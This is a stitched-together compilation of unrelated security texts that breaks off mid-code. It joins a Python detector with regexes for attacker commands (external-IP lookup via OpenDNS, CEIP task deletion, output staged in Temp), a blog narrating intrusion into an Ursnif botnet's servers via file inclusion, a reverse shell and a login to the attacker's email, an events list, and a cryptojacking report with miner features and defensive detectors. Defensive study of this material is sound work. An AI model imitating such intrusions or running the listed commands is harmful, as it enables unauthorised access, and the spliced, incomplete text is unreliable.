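OPENDNS_SELF_LOOKUP = re.compile(r"nslookup\s+myip\.opendns\.com\s+resolver1\.opendns\.com", re.I)

RULES = [
    ("external-ip-discovery-via-opendns", OPENDNS_SELF_LOOKUP),
    # Cleanup/evasion: the CEIP uploader scheduled task is removed.
    ("ceip-uploader-task-deleted",
     re.compile(r"schtasks(\.exe)?\s+/delete\s+/f\s+/TN\s+\"?Microsoft\\Windows\\Customer Experience Improvement Program\\Uploader", re.I)),
    # Shell output redirected into the user's Temp directory for a later read.
    ("cmd-output-staged-in-user-temp",
     re.compile(r"cmd(\.exe)?\s+/C\s+\".*>>?\s*[A-Za-z]:\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.I)),
]

# Target of a ">" or ">>" redirect, with or without surrounding quotes.
REDIRECT_TARGET = re.compile(r'>>?\s*"?([A-Za-z]:\\[^"\s]+)')


def match_rules(cmdline: str) -> List[str]:
    """Names of every rule whose pattern appears in one command line, in RULES order."""
    return [name for name, pattern in RULES if pattern.search(cmdline)]


def scan(events: List[Dict]) -> Dict[int, List[str]]:
    """Map each PID that triggered at least one rule to the rule names it hit."""
    hits: Dict[int, List[str]] = {}
    for event in events:
        names = match_rules(event["cmdline"])
        if names:
            hits[event["pid"]] = names
    return hits


def staged_ip_checks(events: List[Dict]) -> Dict[str, List[int]]:
    """Temp files that received the OpenDNS self-IP lookup, with every PID that wrote to them.

    Grouping by redirect target links the lookup to the staging file the implant
    reads back later, even when the writes come from separate cmd.exe children."""
    writers: Dict[str, List[int]] = {}
    lookup_targets = set()
    for event in events:
        match = REDIRECT_TARGET.search(event["cmdline"])
        if not match:
            continue
        path = match.group(1).lower()          # NTFS paths are case-insensitive
        writers.setdefault(path, []).append(event["pid"])
        if OPENDNS_SELF_LOOKUP.search(event["cmdline"]):
            lookup_targets.add(path)
    return {path: writers[path] for path in sorted(lookup_targets)}


if __name__ == "__main__":
    for pid, names in scan(SAMPLE_EVENTS).items():
        print(pid, names)
    print(staged_ip_checks(SAMPLE_EVENTS))
```

The benign nslookup and the SearchProtocolHost noise produce no hits, which is the point of keying on the OpenDNS resolver pair rather than on nslookup alone.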

So far so good. Everything looked like one of my usual analyses, but something caught my attention. The C2 level_1 had an administration panel which, in my personal opinion, was "hand made" and pretty "young" as an implementation, meaning plain HTML with no client-side controls, no clickjacking protection and no special login tokens. In line with Yoroi's mission (to defend its customers) I decided to go further and try to defend people and/or infected companies by getting inside the entire network and collaborating with local authorities to shut it down, gathering as much information as possible in order to help federal and local police fight cyber crime.

Fortunately I spotted a file inclusion vulnerability in the Command and Control which let me in! The following image shows a reverse shell I spawned on the attacker's command and control.

Reverse Shell On C2 Stage_1

Now I was able to download the entire Command and Control source code (PHP) and study it! The study of this brand new C2 took me to the next level. First of all I was able to get access to the local database, where I found a lot of infected IPs (the IPs which were communicating back to C2 level_1). The following image proves that the downloaded Command and Control system contains Macedonian dialect (Cyrillic script), consistent with the Anunak APT report made by Group-IB.

Command and Control Source Code (snip)
The following image is a simple screenshot of the database dump with victim IPs (which are undisclosed for privacy reasons).

C2 level_1 Database 

Additional investigation of the database brought up new connected IPs. Those IPs were querying MySQL with administrative rights. At least two additional layers of C2 were present. While level_1 was weaponising the malware implant, level_2 was collecting information from victims. Thanks to the source code study it was possible to find more 0-days to be used against the C2 and to break into C2 level_2. Now I was able to see encrypted URLs coming from infected hosts. Important steps ahead are intentionally missing. Among many URLs the analyst was able to figure out a "test" connection from the attacker and focus on decrypting that connection. Fortunately everything needed was written in the command and control source code. In this specific case the following function was fundamental to getting to clear text!

URL Decryption Function
The eKey was stored right in the DB and the decryption function was quite easy to reverse. Finally it was possible to figure out how to decrypt the attacker's testing string (the first transaction available in the logs) and voilà, it was possible to log into the attacker's email :D !

Attacker eMail: VPS credentials
Once "in", a new need arose: discovering the entire network by getting access to the VPS control panel. After some active steps directly on the attacker's infrastructure it was possible to get access to the entire VPS control panel. At this point the general infrastructure picture* was clear, and so was how to block the threat, not only for customers but for everybody!

Attacker VPS Environment

Sharing these results for free would enable vendors (for example AV companies, firewall companies, IDS companies and so on) to update their signatures and block such a threat for everybody all around the world. I am sure that this work will not stop malicious actors, BUT at least we can raise our voice against cyber criminals!

Summary:
In this post I described the main steps that took me to gain access to a big Ursnif/Gozi botnet in order to shut it down by alerting federal and national authorities (no direct destructive actions were performed on the attacker's infrastructure). The threat appeared very well structured: Docker containers were adopted to automate deployment of the malicious infrastructure and the code was quite well engineered. Many layers of command and control were found, and the entire infrastructure was probably set up by a criminal organisation rather than by a single person.

The following graph shows the victim distribution in August 2018. The main targets are currently the USA with 47% of the victims, followed by Canada (29.3%) and Italy (7.3%). Total victims in August 2018 number several thousand.


Victims Distribution on August 24 2018

During the analysis it was interesting to observe that the attacker was acquiring domains from an apparent "black market" where many actors were selling and buying "apparently compromised domains" (no evidence for this last sentence, only a feeling). The system (following picture) looks like a trading platform with a public API that third-party systems can operate, much like stock operators.

Apparent Domain BlackMarket

Hope you enjoyed the reading.


IoCs:
Following is a list of interesting artefacts that would be helpful to block and prevent the described threat.

Windows Services Names:
  • WSearch
  • WerSvc
Involved eMails:
  • 890808977777@mail.ru
  • willi12s@post.com

*Actually it was not the whole network; a couple of external systems were investigated as well.

Upcoming cybersecurity events featuring BH Consulting

Here is a summary of upcoming cybersecurity events, conferences, webinars and training programmes where BH Consulting staff will deliver presentations about issues relating to cybersecurity, data protection, GDPR, and privacy. Each listing includes links for more information and registration.

BSides Belfast 2018: 27 September

BH Consulting is sponsoring the Belfast edition of the popular BSides security conference, which is now in its third year. As ever, the event will feature a mix of discussions, demos and talks from local and international experts. The conference will take place at the Europa Hotel. Check the event website for updates on speakers and presentations, along with a review of previous years. There is a nominal fee of £10 per ticket and you can book via this link.

COSAC and the SABSA World Congress: Naas, 30 September-4 October

Valerie Lyons will speak about leading information security teams at the COSAC World Congress at Killashee Hotel in Naas, Co Kildare. Now in its 25th year, the information security symposium includes the SABSA World Congress. The event prohibits any sales content, and focuses purely on practicing professionals sharing their experience and debating issues. For more details, and registration options, visit here.

Filling the cybersecurity skills gap: Dublin, 3 October

This is a half-day event taking place at the Irish Management Institute on Wednesday October 3. The sessions will feature a mix of industry speakers along with three workshops aimed at improving understanding of cybersecurity and risk at senior management and board level. BH Consulting’s Brian Honan will deliver a talk about the current security threats facing industry. He will also suggest ways in which a broad-based skills initiative could reduce the impact of cybercrime. The event is free to attend but registration is essential. Visit this page for details and a booking link.

IP EXPO Europe: London, 3-4 October

Brian Honan will deliver a keynote at IP EXPO Europe, which takes place in London this October. The event comprises multiple tracks including one dedicated to cybersecurity. In his presentation, Brian will look at how car safety has evolved and how cybersecurity needs to do the same. For more details about the two-day conference, and to book tickets, go to the IP EXPO website.

BruCON: Brussels, 3-5 October

Once again, BH Consulting is delighted to sponsor BruCON. The organisers describe their event as for security researchers, hackers, nerds and other beings with a creative and critical view of life. The conference runs for three days in the Belgian capital. More details and a link to buy tickets are available here.

Dublin Information Sec 2018: 15 October

Brian Honan is among a host of prominent security commentators lined up to present at this annual conference. The agenda promises to cover a range of topics, from regulations like GDPR to emerging security problems, and gauging your organisation’s security to looking at new technology with potential use for security. The all-day conference will take place on Monday 15 October at the RDS. Visit here for details and ticket booking.

IRISSCON: Dublin, 22 November

The tenth annual IRISSCERT Cyber Crime Conference has one of its strongest lineups yet. Confirmed speakers include Wendy Nather, Dave Lewis, Andrew Hay, Jack Daniel, Javvad Malik, Martijn Grooten, Quentyn Taylor, Robert McArdle and Eoin Keary. IRISSCON will take place at the Ballsbridge Hotel on Thursday 22 November, running all day. Staff from BH Consulting will be there on the day. Check the conference website for more updates. Tickets cost just €50 and you can book via this link.

The post Upcoming cybersecurity events featuring BH Consulting appeared first on BH Consulting.

How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners

Introduction

Cyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.

This blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.

What Is Mining?

As transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into "blocks" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the "chain" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called "pools" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.


Figure 1: The role of miners

Underground Interest

FireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.
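The keywords above map to concrete wire artefacts a defender can look for: a miner joins a pool over the Stratum protocol, and its first message (an XMRig-style JSON-RPC "login" or a cpuminer-style "mining.subscribe") names the mining agent. The detector below is an added example rather than code from the report; it runs over constructed flow records, and the pool addresses, ports, agent strings and wallet/job fields are placeholders.

```python
import json
import re
from typing import Dict, List, Optional

# Method names of the two Stratum dialects miners speak: the JSON-RPC "login"
# family used by CryptoNote/Monero miners such as XMRig, and the "mining.*"
# family used by cpuminer/ccminer-style tools.
STRATUM_METHODS = {"login", "submit", "keepalived",
                   "mining.subscribe", "mining.authorize", "mining.submit"}
SESSION_START = {"login", "mining.subscribe", "mining.authorize"}
# Agent strings of the utilities named in this post (case-insensitive substring match).
MINER_AGENT = re.compile(r"xmrig|xmr-stak|cpuminer|ccminer|minergate|claymore", re.I)

# Constructed flow records: the first application-data line of a few outbound
# TCP connections, as a network sensor might log them. Not real captures.
SAMPLE_FLOWS = [
    {"src": "10.0.0.12", "dst": "203.0.113.10", "dport": 3333,
     "payload": '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"WALLET_PLACEHOLDER","pass":"x","agent":"XMRig/2.6.2","algo":["cn","cn/1"]}}'},
    {"src": "10.0.0.12", "dst": "203.0.113.10", "dport": 3333,
     "payload": '{"id":2,"jsonrpc":"2.0","method":"submit","params":{"id":"SESSION_PLACEHOLDER","job_id":"JOB_PLACEHOLDER","nonce":"00000000","result":"00"}}'},
    {"src": "10.0.0.7", "dst": "198.51.100.5", "dport": 443,
     "payload": "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"},
    {"src": "10.0.0.9", "dst": "203.0.113.22", "dport": 14444,
     "payload": '{"id":1,"method":"mining.subscribe","params":["cpuminer-multi/1.3.4"]}'},
    # JSON-RPC that is not Stratum: must not be flagged.
    {"src": "10.0.0.9", "dst": "203.0.113.22", "dport": 14444,
     "payload": '{"id":3,"jsonrpc":"2.0","method":"eth_getBalance","params":["0x0","latest"]}'},
]


def classify_payload(payload: str) -> Optional[Dict]:
    """Describe a Stratum message, or return None for anything else."""
    try:
        msg = json.loads(payload)
    except ValueError:                     # covers json.JSONDecodeError
        return None
    if not isinstance(msg, dict) or msg.get("method") not in STRATUM_METHODS:
        return None
    params = msg.get("params")
    agent = wallet = None
    if isinstance(params, dict):           # CryptoNote-style login carries a dict
        agent = params.get("agent")
        wallet = params.get("login")
    elif isinstance(params, list) and params and isinstance(params[0], str):
        agent = params[0]                  # mining.subscribe puts the agent first
    return {"method": msg["method"], "agent": agent, "wallet": wallet,
            "known_miner": bool(agent and MINER_AGENT.search(agent))}


def detect(flows: List[Dict]) -> List[Dict]:
    """One alert per Stratum message, tagged with the flow it was seen on."""
    alerts = []
    for flow in flows:
        hit = classify_payload(flow["payload"])
        if hit:
            hit.update(src=flow["src"], pool=f'{flow["dst"]}:{flow["dport"]}')
            alerts.append(hit)
    return alerts


def mining_hosts(flows: List[Dict]) -> List[str]:
    """Internal hosts that opened a mining session (login/subscribe), deduplicated."""
    return sorted({a["src"] for a in detect(flows) if a["method"] in SESSION_START})


if __name__ == "__main__":
    for alert in detect(SAMPLE_FLOWS):
        print(alert)
    print("hosts with mining sessions:", mining_hosts(SAMPLE_FLOWS))
```

Matching on the Stratum method set rather than on port numbers matters because pools listen on arbitrary ports, and a payload-level check still works when the miner is configured for an unusual one.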


Figure 2: Underground keyword mentions

Monero Is King

The majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called "ring signatures," which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are unfeasible to be revealed through blockchain analysis, ensuring that Monero transactions are unable to be linked while also being cryptographically secure.

The Monero blockchain also uses what's called a "memory-hard" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.

Underground Advertisements for Miners

Because most miner utilities are small, open-sourced tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.

XMR Mining Utilities

XMR-STACK

MINERGATE

XMRMINER

CCMINER

XMRIG

CLAYMORE

SGMINER

CAST XMR

LUKMINER

CPUMINER-MULTI

Table 1: Commonly used Monero miner utilities

The following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.

Sample Advertisement #1 (Smart Miner + Builder)

In early April 2018, actor "Mon£y" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD – payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero – that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:

  • Unlimited builds
  • Builder GUI (Figure 4)
  • Written in AutoIT (no dependencies)
  • FUD
  • Safer error handling
  • Uses most recent XMRig code
  • Customizable pool/port
  • Packed with UPX
  • Works on all Windows OS (32- and 64-bit)
  • Madness Mode option


Figure 3: Monero Madness


Figure 4: Monero Madness builder

Sample Advertisement #2 (Miner + Telegram Bot Builder)

In March 2018, FireEye iSIGHT Intelligence observed actor "kent9876" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:

  • Written in C/C++
  • Build size is small (about 100–150 kB)
  • Hides miner process from popular task managers
  • Can run without Administrator privileges (user-mode)
  • Auto-update ability
  • All data encoded with 256-bit key
  • Access to Telegram bot-builder
  • Lifetime support (24/7) via Telegram


Figure 5: Goldig Miner advertisement

Sample Advertisement #3 (Miner + Credential Stealer)

In March 2018, FireEye iSIGHT Intelligence observed actor "TH3FR3D" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:

  • Written in C# (Version 1.0.1.0)
  • Browser stealer for all major browsers (cookies, saved passwords, auto-fill)
  • Monero miner (uses minergate.com pool by default, but can be configured)
  • Filezilla stealer
  • Desktop file grabber (.txt and more)
  • Can download and execute files
  • Update ability
  • USB spreader functionality
  • PHP web panel


Figure 6: Felix HTTP

Sample Advertisement #4 (Miner + RAT)

In January 2018, FireEye iSIGHT Intelligence observed actor "ups" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the CVE-2016-0099 exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for €200 EUR, or €325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:

Windows Build Specifics

  • Written in C++ (no dependencies)
  • Miner component based on XMRig
  • Easy cryptor and VPS hosting options
  • Web panel (Figure 7)
  • Uses TLS for secured communication
  • Download and execute
  • Auto-update ability
  • Cleanup routine
  • Receive remote commands
  • Perform privilege escalation
  • Features "game mode" (mining stops if user plays game)
  • Proxy feature (based on XMRig)
  • Support (for €20/month)
  • Kills other miners from list
  • Hidden from TaskManager
  • Configurable pool, coin, and wallet (via panel)
  • Can mine the following Cryptonight-based coins:
    • Monero
    • Bytecoin
    • Electroneum
    • DigitalNote
    • Karbowanec
    • Sumokoin
    • Fantomcoin
    • Dinastycoin
    • Dashcoin
    • LeviarCoin
    • BipCoin
    • QuazarCoin
    • Bitcedi

Linux Build Specifics

  • Issues running on Linux servers (higher performance on desktop OS)
  • Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)


Figure 7: Miner bot web panel

Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)

In August 2017, actor "MeatyBanana" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:

  • Configurable miner pool and port (default to minergate)
  • Compatible with both 64- and 86-bit Windows OS
  • Hides from the following popular task managers:
    • Windows Task Manager
    • Process Killer
    • KillProcess
    • System Explorer
    • Process Explorer
    • AnVir
    • Process Hacker
  • Masked as a system driver
  • Does not require administrator privileges
  • No dependencies
  • Registry persistence mechanism
  • Ability to perform "tasks" (download and execute files, navigate to a site, and perform DDoS)
  • USB spreader
  • Support after purchase

The Cost of Cryptojacking

The presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:

  1. Degradation in system performance
  2. Increased cost in electricity
  3. Potential exposure of security holes

Cryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.

In the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominately rely on decades-old hardware and low-bandwidth networks, therefore even a slight increase in CPU load or the network could leave industrial infrastructures unresponsive, impeding operators from interacting with the controlled process in real-time.

The electricity cost, measured in kilowatt-hours (kWh), depends on several factors: how often the malicious miner software is configured to run, how many threads it is configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212 kWh. They estimated that this equated to monthly electricity costs of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.

Cryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as TRITON.

Cryptocurrency Miner Distribution Techniques

In order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:

  • User endpoint machines
  • Enterprise servers
  • Websites
  • Mobile devices
  • Industrial control systems

Cryptojacking in the Cloud

Private sector companies and governments alike are increasingly moving their data and applications to the cloud, and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.

The following are some real-world examples of cryptojacking in the cloud:

  • In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the post-exploitation and pre-mining dissemination techniques used in those campaigns.
  • In March 2018, Bleeping Computer reported on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.
  • In February 2018, Bleeping Computer also reported on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.
  • Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the LA Times online compromise in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.
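An added example (not from the original post) of the misconfiguration behind the last bullet: a bucket policy that grants write access to every principal lets anyone on the internet replace hosted content with a mining script. The checker below flags public write grants in a weak policy and shows a hardened policy for the same static site; the bucket name, the account ID and the deploy role are placeholders.

```python
import json
from typing import Any, Dict, List

# Actions that let a caller change or remove what a bucket serves. Wildcards
# count, because "s3:*" granted to everyone is the usual form of this mistake.
WRITE_ACTIONS = {"s3:putobject", "s3:putobjectacl", "s3:deleteobject", "s3:*", "*"}
READ_ACTIONS = {"s3:getobject", "s3:listbucket", "s3:*", "*"}

# Constructed policy for a static site that, besides public read, lets anyone upload.
WEAK_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "PublicReadWrite",
    "Effect": "Allow",
    "Principal": "*",
    "Action": ["s3:GetObject", "s3:PutObject"],
    "Resource": "arn:aws:s3:::www-assets-example/*"
  }]
}""")

# Same site, hardened: the public gets read only; writes are limited to one deploy role.
HARDENED_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "PublicReadOnly", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::www-assets-example/*"},
    {"Sid": "DeployRoleWrites", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::123456789012:role/site-deploy"},
     "Action": ["s3:PutObject", "s3:DeleteObject"],
     "Resource": "arn:aws:s3:::www-assets-example/*"}
  ]
}""")


def _as_list(value: Any) -> List[Any]:
    """Policy fields may be a scalar or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def is_public_principal(principal: Any) -> bool:
    """IAM treats "*" and {"AWS": "*"} as everyone, including anonymous callers."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def public_grants(policy: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Allow statements whose principal is the whole internet, with what they grant."""
    grants = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not is_public_principal(stmt.get("Principal")):
            continue
        actions = {a.lower() for a in _as_list(stmt.get("Action", []))}
        grant = {"sid": stmt.get("Sid"),
                 "public_read": bool(actions & READ_ACTIONS),
                 "public_write": bool(actions & WRITE_ACTIONS),
                 # A Condition may narrow the grant; surface it for review rather than trusting it.
                 "conditioned": "Condition" in stmt}
        if grant["public_read"] or grant["public_write"]:
            grants.append(grant)
    return grants


def allows_public_write(policy: Dict[str, Any]) -> bool:
    """True when anyone can upload or replace objects, which is all it takes to
    plant a mining script in content the bucket serves."""
    return any(g["public_write"] for g in public_grants(policy))


if __name__ == "__main__":
    for name, policy in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, "public write:", allows_public_write(policy), public_grants(policy))
```

Explicit Deny statements, bucket ACLs and the account-level S3 Block Public Access setting are not modelled here, so treat a clean result as one input to a review rather than proof the bucket is closed.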

Incorporation of Cryptojacking into Existing Botnets

FireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.

The following are some real-world examples of cryptojacking being incorporated into existing botnets:

  • In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.
  • On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.
  • In late 2017, Bleeping Computer reported that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.
  • In late 2017, FireEye researchers observed Trickbot operators deploy a new module named "testWormDLL" that is a statically compiled copy of the popular XMRig Monero miner.
  • On Aug. 29, 2017, Security Week reported on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.

Drive-By Cryptojacking

In-Browser

FireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.
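An added example (not from the original post) of how a site owner or analyst can check a page for the in-browser miners described above: it flags third-party script loads, the Coinhive and AuthedMine loaders, the throttle setting (and the CPU share it implies) and any WebSocket pool endpoint, and produces the Content-Security-Policy that would block both. The sample page, hostnames and site key are constructed.

```python
import re
from typing import Any, Dict
from urllib.parse import urlparse

# Loader URLs of the in-browser miners this post names (Coinhive and its
# opt-in variant AuthedMine). Extend the list for other families.
LOADER_PATTERNS = [
    ("coinhive", re.compile(r"coinhive\.com/lib/coinhive\.min\.js", re.I)),
    ("authedmine", re.compile(r"authedmine\.com/lib/authedmine\.min\.js", re.I)),
]
SCRIPT_SRC = re.compile(r"<script[^>]+src=['\"]([^'\"]+)['\"]", re.I)
# new CoinHive.Anonymous('site-key', {throttle: 0.2}) and the User/Token variants
CONSTRUCTOR = re.compile(
    r"new\s+CoinHive\.(Anonymous|User|Token)\s*\(\s*['\"]([^'\"]+)['\"]\s*(?:,\s*(\{.*?\}))?", re.S)
THROTTLE = re.compile(r"throttle\s*:\s*([0-9.]+)")
WS_ENDPOINT = re.compile(r"wss?://[^\s'\"<>]+")

# Constructed page: one first-party script, a third-party Coinhive load with
# throttle 0.2 (80 % of the CPU, the figure quoted in this post) and a fork
# talking to a private pool. Hostnames and the site key are placeholders.
SAMPLE_PAGE = """<html><head>
<script src="https://www.site.example/static/app.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', {throttle: 0.2});
  miner.start();
</script>
<script>
  var sock = new WebSocket('wss://ws.pool.example:8443/proxy');
</script>
</head><body><p>hello</p></body></html>"""


def scan_html(html: str, page_host: str) -> Dict[str, Any]:
    """Collect in-browser mining indicators from a page's HTML."""
    findings: Dict[str, Any] = {"third_party_scripts": [], "miner_loaders": [],
                                "miners": [], "pool_endpoints": [], "cpu_share_pct": None}
    for src in SCRIPT_SRC.findall(html):
        host = urlparse(src).hostname
        if host and host != page_host:
            findings["third_party_scripts"].append(src)
        for name, pattern in LOADER_PATTERNS:
            if pattern.search(src):
                findings["miner_loaders"].append(name)
    for kind, site_key, opts in CONSTRUCTOR.findall(html):
        miner: Dict[str, Any] = {"kind": kind, "site_key": site_key}
        throttle = THROTTLE.search(opts) if opts else None
        if throttle:
            miner["throttle"] = float(throttle.group(1))
            # Coinhive's throttle is the idle fraction, so the CPU share is the remainder.
            findings["cpu_share_pct"] = round((1 - miner["throttle"]) * 100)
        findings["miners"].append(miner)
    findings["pool_endpoints"] = sorted(set(WS_ENDPOINT.findall(html)))
    return findings


def is_cryptojacking(findings: Dict[str, Any]) -> bool:
    """A miner loader or a miner constructor is enough; pool endpoints alone are not."""
    return bool(findings["miner_loaders"] or findings["miners"])


def recommended_csp(page_host: str) -> str:
    """A Content-Security-Policy restricting scripts and WebSocket connections to
    the site's own origin. Third-party miner loads and pool connections both
    fail under it; legitimate inline scripts then need a nonce or hash."""
    return (f"script-src 'self' https://{page_host}; "
            f"connect-src 'self' https://{page_host} wss://{page_host}")


if __name__ == "__main__":
    result = scan_html(SAMPLE_PAGE, "www.site.example")
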